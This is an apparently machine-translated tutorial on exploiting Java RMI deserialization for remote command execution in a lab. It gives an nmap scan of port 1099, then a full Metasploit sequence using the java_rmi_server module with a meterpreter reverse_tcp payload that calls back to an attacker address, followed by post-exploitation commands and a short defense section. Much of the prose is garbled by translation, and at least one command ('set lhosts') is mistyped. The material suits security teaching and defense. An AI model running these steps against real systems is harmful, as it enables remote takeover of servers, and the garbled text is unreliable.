6-17 vulnerability exploitation - deserialization remote command execution vulnerability

Java rmi Introduce

Java RMI A method of is called remotely （Remote Method Invocation）. It's a mechanism , Be able to make in some java The object on the virtual machine calls another java Methods on objects in virtual machine .

RMI yes J2SE Part of , Enables programmers to develop software based on JAVA Distributed applications . One rmi The object is a remote JAVA object , Can be from another JAVA Virtual machine （ Even across the Internet ） Call its method , It can be like calling local JAVA Call the method of the remote object just like the method of the object , Is distributed in different JVM The objects in the look and behave like local objects .

We have JVM1 and JVM2,JVM1 and JVM2 You can interact back and forth ,JVM1 You can call JVM2 The method on the ,JVM2 You can call JVM1 The method on the , adopt RMI Technical realization

For any object as a parameter RMI Interface , You can send an object built by yourself , Force the server to exist this object as any one in class path To deserialize .

RMI The transmission of 100% Based on deserialization . First, he has to convert strings into objects , After deserialization, the object is converted into a string , So as to achieve the effect of transmission

Target detection rmi

Use Nmap -p 1099 -sV IP Address detection target version information .

nmap -sV -p 1099 192.168.1.106

You can see that the corresponding version information and running services are detected here , Service information localhost

In practice , Be sure to use vulnerability scanners , Conduct vulnerability detection , But we can directly POC Make use of

rmi Remote command execution utilizes

Use Metasploit Yes rmi RCE Exploit .

In fact, it is metasploit Module in , Serialize the commands of our system , Transferred to the rmi, In the process of transmission ,rmi What will be delivered , Convert to system commands , The whole process is because metasploit Constructed a special object , stay rmi server It is implemented , We are connected here server There was a conversation , The module we use is exploit

msfconsole
use exploit/multi/misc/java_rmi_server
show options
set rhosts 192.168.1.105
ifconfig
show payloads
set payload java/meterpreter/reverse_tcp
show options
set lhosts 192.168.1.103
exploit

sessions -l
sessions -i 1

?
// See the commands you can use 

sysinfo

View the current system information

ps
// View current process information 

Of course , We can also do other operations , Use meteasploit Conduct post penetration test , Upload and download , Fine

Defense repair

1、 There is a deserialization transport .– Particular attention , See if you can use the deserialization vulnerability to execute system commands

2、 There are defective third-party libraries such as commons-collections Timely upgrade Library , Or use another library , To replace the defective third-party library , This is what we need to do .

When setting permissions , Be sure to pay attention to , We java Of rmi process , Have the authority to execute our system , Or only part of it , Up to a point , It will restrict the execution of system commands , Achieve the effect of defense